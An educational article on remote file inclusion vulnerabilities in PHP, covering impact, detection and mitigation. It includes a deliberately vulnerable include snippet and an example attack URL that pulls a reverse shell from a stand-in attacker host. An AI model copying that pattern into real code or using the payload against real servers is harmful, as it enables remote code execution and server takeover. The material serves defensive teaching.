Remote file inclusion (RFI) is a web vulnerability that lets a malicious hacker force the application to include arbitrary code files imported from another location, for example, a server controlled by the attacker.
Severity: |
![]() ![]() ![]() ![]() |
very severe |
Prevalence: |
![]() |
discovered very rarely |
Scope: |
![]() |
appears mostly in older versions of PHP |
Technical impact: | remote code execution | |
Worst-case consequences: | full system compromise | |
Quick fix: | turn off remote inclusion in web server settings |
Many programming languages, including those used on the server side for developing web applications, let the developer include source code from other files. Some functions used to include source code only allow you to include local files, but in some languages, they also allow inclusion by URL. This is useful for including, for example, source code files located on other servers in a complex multi-server application.
Such inclusion is often static, i.e. the URL of the file is defined in the source code and cannot be modified. However, in some applications, the developer may want to include a file dynamically from a remote location. If so, the URL of the remote file might be passed in a user input parameter.
Remote file inclusion vulnerabilities happen when a malicious actor can modify user input to include their own remote files. This vulnerability most often happens in applications and APIs written in older versions of PHP with the include expression. In the case of other common web application programming languages, including files in a similar way requires much more complex programming constructs.
Note that the ability to include remote files has been deprecated since PHP 7.4.0, released in November 2019.
If the attacker can include a malicious file only from the same server, that is a local file inclusion (LFI) vulnerability. LFI vulnerabilities are much more common for several reasons:
Local file inclusion also often goes together with directory traversal. RFI, on the other hand, by definition cannot lead to directory traversal because the file is included by URL, not by path/filename.
You can also think about RFI as an attack that is in a way similar to cross-site scripting. In both cases, a vulnerable application takes untrusted code from an external source and executes it. However, in the case of RFI, attackers are abusing the PHP include
mechanism instead of a <script>
tag.
Below is an example of PHP code with a remote file inclusion vulnerability, as well as an attack vector on an application that includes this code.
The developer of a PHP application wants to include a source code file from another server but the included file is not static. The following is a code snippet from the index.php file.
<?PHP
$module = $_GET["module"];
include $module;
?>
The server runs PHP 7.3.33. The php.ini file includes the following configuration parameter:
allow_url_include = On
This parameter (deprecated in PHP 7.4.0) means that the include expression can parse a URL and include a file from that URL.
The URL is taken directly from the GET HTTP request, so you can include the module http://server2.example.com/welcome.php as follows:
http://example.com/index.php?module=http://server2.example.com/welcome.php
The attacker manipulates the GET request sent to index.php to include a URL with a pentest monkey reverse shell script configured to connect to an attacker-controlled server:
http://example.com/index.php?module=http://attacker.example2.com/php-reverse-shell.php
As a result, the application runs the code of the reverse shell (remote code execution), granting the attacker remote access to the server command line.
As you can see from the examples above, remote file inclusion vulnerabilities may lead to remote code execution and, as a result, the attacker could gain complete control of the server. However, the included code has the same execution permissions as the web server user, so its access rights are limited.
In an RFI attack, cybercriminals can use any malicious code, so depending on their intentions, they can try to escalate RFI to any of the following cyberattack scenarios:
The following are some examples of common open-source web apps that had a remote file inclusion vulnerability:
The best way to detect remote file inclusion vulnerabilities depends on whether they are already known or unknown.
There are several methods that allow you to prevent remote file inclusion vulnerabilities in your code:
Note: Do not rely on blacklisting, encoding, or methods of input validation/sanitization such as filtering to prevent remote file inclusion. For example, don’t try to limit or enforce file extensions or block special character sequences. Attackers have many ways of bypassing such filters.
There are two very effective ways to mitigate remote file inclusion attacks in PHP:
allow_url_include = Off
to the php.ini file.This will make remote file inclusion impossible, no matter if the applications running on the web server are custom applications written by your developers or third-party/open-source applications. However, this may stop some legacy applications from working.
Classification | ID |
---|---|
CAPEC | 193 |
CWE | 98 |
WASC | 5 |
OWASP 2021 | A1 |
Remote file inclusion (RFI) is a web vulnerability that lets a malicious hacker force the application to include arbitrary code files imported from another location, for example, a server controlled by the attacker. It is similar to local file inclusion.
Remote file inclusion vulnerabilities may lead to remote code execution and, as a result, the attacker could gain complete control of the server. However, the included code has the same execution permissions as the web server user, so its access rights are limited.
To avoid RFI and many other vulnerabilities, follow secure programming habits and never trust user input. If you need to include remote files, use a whitelist of safe file names and locations.